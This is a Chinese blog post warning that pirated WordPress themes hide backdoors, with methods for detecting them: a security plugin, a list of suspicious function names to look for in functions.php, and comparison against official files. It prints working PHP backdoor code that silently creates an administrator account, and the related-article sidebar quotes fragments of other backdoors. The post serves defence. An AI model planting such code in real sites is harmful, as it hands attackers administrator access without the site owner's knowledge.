小心WordPress盗版主题里暗藏后门

最新推荐文章于 2023-05-19 08:50:34 发布
最新推荐文章于 2023-05-19 08:50:34 发布
阅读量906 收藏 3
点赞数 1
分类专栏: Wordpress 文章标签: wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChanYao/article/details/114013322
版权

下面给大家看看这个常见的后门代码

add_action( ‘wp_head’, ‘wp_backdoor’ );
function wp_backdoor() {
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’
) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {
$user_id = wp_create_user( ‘backdoor’, ‘123456’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}

由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件functions.php中的话,然后就会自动创建一个用户名为backdoor,密码为123456的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台获得管理员权限,也就是说,网站后台被拿到shell,后果你可以自己想象一下。

所以搜刮在这里建议大家不要随便乱使用WordPress的盗版主题,支持正版。

哪如何检测Wordpress主题是否有后门呢?

第一种使用工具检测(插件检测)主题方法:

安装插件方法:

Wordpress后台——外观——TAC——启动Theme Authenticity Checker安全检测插件

然后就会自动检测,如果出现全部为绿色,则表示没有任何后门

如果有异常请点击Details产看,并按照路径进行相关处理

第二种使用手动检测主题方法:

使用ftp工具查看源码:找到fuctions.php这个文件

查看是否包含以下函数:

function __popular_posts

function stripos

function scandir

function _getprepare_widget

add_action(“init”, “_getprepare_widget”);

function _get_allwidgets_cont

function strripos

function _checkactive_widgets

add_action(“admin_head”, “_checkactive_widgets”);

第三种使用文件同步对比法检测主题方法:

首先在wordpress官网下载跟你源码相同版本的代码

找到下载源码中的fuctions.php与你的程序源码的fuctions.php进行对比

对比的时候请注意,如果对比出现红色的可以询问相关技术人员,或者在网上进行搜索

对比推荐使用软件Beyond Compare 4点击进行文本对比即可

ChanYao
关注
专栏目录
气死了,好好的wordpress主题,被人植入了后门程序
06-22 776
最近一直在研究wordrpess主题,但不知道为什么,新建的网站浏览量很好,但是搜索内容几乎为零,我看了下大体的浏览方向,发现IP地址都在河南地区,我就奇怪了,什么人比我还用心,天天打开我网站看啊。 今天在检查代码的时候发现我的wordpss主题中被人插入了如下的代码: <?php function _verifyactivate_widgets(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FI
WordPress安全设置方案、模板中function.php样式漏洞优化
Java_c#
05-28 873
一、升级WordPress到最新版本 二、隐藏WordPress版本 网站页面(如head.php)中不要有版本信息,防止黑客根据版本漏洞攻击。 删除根目录下默认生成的readme.html、license.txt、wp-links-opml.php 三、文件权限设置 所有的文件,只有自己的用户帐号有写入权限,其它的只设置有读权限。 四、安装Login Lockdown插件 这个插件可以记录失败的登录尝试的IP地址和时间,如果来自某一个IP地址的这种失败登录超过一定条件,那...
防范wordpress主题后门代码获取管理员权限
09-29
只需几行代码就可以为WordPress主题留下后门,大家要小心
wordpress免费模板会不会留后门
xiaoyuya
09-29 225
后门是违法行为,wordpress主题制作者打死也不敢自己给自己做的wordpress主题留个后门,除非他想吃牢饭。 有些人的网站被黑了,首先会怀疑是不是自己下载的免费主题有问题,这么怀疑也正常。 但是,你得先问问自己的主题是在哪下载的,是不是来源可靠。 本站louyuwu.net提供的的均为精智wordpress主题http://www.jianzhanpress.com提供的免费主题,经过验证,来源可靠的才敢放上来了。 如果你是到一些,不知道来源的下载站,随便就下载了个wordpress..
黑客在数十个 WordPress 插件和主题中插入秘密后门,可发动供应链攻击
smellycat000的专栏
01-24 787
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
猥琐的wordpress后门分享
weixin_33781606的博客
12-17 309
  https://www.t00ls.net/thread-37312-1-1.html 一个可以自动调用管理员帐号登录wordpress后台的方法。 <?php require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。 $query_str = "SELECT ID F...
WordPress主题后门严重威胁网站安全
jinyeweiyang的专栏
12-13 914
WordPress是国内站长非常喜欢采用的一款建站应用软件,由于其具有非常丰富的模版和插件,具有良好的可扩展性。特别对于博客类网站,WordPress几乎成为建站首选。 在阿云安全团队的日常运营中,我们发现,WordPress一直是黑客攻击的主要目标。下图是阿云云盾安全运营团队对第三方应用遭受攻击的统计(Source:第27期阿云云盾安全运营报告,http://security.ali
资源宝分享wordpress主题后门检测清理技巧
云博客_资源宝分享
04-29 2135
资源宝分享wordpress主题后门检测清理技巧 更多文章查看资源宝博客:www.httple.net 但是对于wordpress漏洞并不是所有人都很了解,往往在网站运营过程中没能注意网站的安全。 网站的安全除了空间服务商本身的安全控制外,那就是网站程序本身的安全问题。那我们该如何保障网站自身的安全呢?下面就以我的资源宝博客为例,来说说wordpress网站的安全问题。话说wordpress类网站的安全主要从两方面来讲: 一、wordpress程序本身安全 wordpress本身就存在一些漏洞,所以
黑客利用WordPress 插件暗中建立后门网站
w3cschools的博客
04-25 797
Eval PHP 插件的工作方式足以将页面保存为草稿,以便在 [evalphp] 短代码中执行 PHP 代码,” 东方联盟安全研究人员解释说,并补充说这些恶意页面是由真正的网站管理员创建的,这表明攻击者能够以特权用户身份成功登录。Sucuri 表示,在过去 6 个月中,它在受感染网站上检测到超过 6,000 个后门实例,将恶意软件直接插入数据库的模式描述为“新的有趣的发展”。攻击链需要在受感染的网站上安装 Eval PHP 插件,并滥用它在多个帖子中建立持久性后门,这些帖子有时也保存为草稿。
什么是后门
w18842156489的博客
05-19 879
通常指那些绕过安全性控制而获取对程序或系统访问权的程序方法。 在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。
wordpress 黑客_如何在被黑客入侵的WordPress网站中找到后门并进行修复
cumohuo9136的博客
09-07 1719
wordpress 黑客Time and time again, we have helped users fix their hacked WordPress sites. Most of the time when they reach out to us, they have already cleaned up the site, and the hacker was able to ge...
Ripro9.0免扩展二开版WordPress博客主题Ripro全解密无后门
10-13
RiPro9.0二开版本 完全解密修正版,无后门更放心!免扩展、虚拟主机就能用!且修正了原版的多处BUG,更好用!子主题有huzao-child主题和sheji-child子主题美化包,共两款。内置多个插件,均正常运行
wordpress-Zibll子比主题-最新版本V5.7-免授权无后门
08-08
此次更新以优化为主,更新内容不多,主要是因为大多数精力都在进行论坛系统的开发,在这也就提前预告一下,论坛系统将会在下一版发布,主题的论坛系统仍保持漂亮的UI设计,同时功能强大,可以完美的实现圈子、问答...
开源WordPress博客主题二次元风-LoliMeow主题
最新发布
06-08
WordPress二次元风博客主题/LoliMeow(洛丽喵)是盒子萌的一款主题主题特点: 1、侧栏/无侧栏切换! 2、会员中心(配套Erphpdown插件使用),可以做到收费下载/查看/会员中心/在线充值积分等等都齐全! 3、pjax...
最新WordPress找回后台管理员密码(资源宝博客在此分享4种方法)
云博客_资源宝分享
04-29 1816
最新WordPress找回后台管理员密码(4种方法分享) 网站多了,或者长时间不用了,就容易忘记 WordPress 后台密码,这个时候你不要惊慌, WordPress 忘记后台密码后的解决办法,总有一款适合你的。 方法1:数据库修改方法(随着WP更新版,可能有点问题,不过先发出来) 登入phpMyAdmin后,先从左边选自己的数据库,然后点上面的 SQL 标签页,执行下面命令 (方法1): UPDATE `wp_users` SET `user_pass`='$P$BWZhQxx/R9UCBgECUh
wordpress中常用的方法笔记(一)
Android、HTML、CSS、JS、JAVA、Kotlin、PHP等技术
05-01 364
wordpress中常用的方法笔记(一)Update_option() 方法admin_head 动作用户权限after_setup_theme钩子 Update_option() 方法 更新一对配置属性值到数据库。$ option的值需要在插入到数据库之前用$wpdb->prepare方法来进行转义。这个值必须正确的处理。 这个方法可以用来代替add_option,尽管它确实没那么灵活。update_option会去检查这个配置属性是否存在。如果不存在,会使用add_option(‘option_
wordpress 使用wp_head()函数
weixin_33910434的博客
07-05 937
wp_head()的作用: 在WordPress主题中使用此函数控制<head>…</head>之间的标签内容。 以通过header.php模板文件输出html中的head标签部分, 大部分主题的head标签中都加入了wp_head()函数, WordPress主题或插件都可以通过给wp_head函数来向网站的head标签中加入内容。 用法: 请确认你的所有页...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值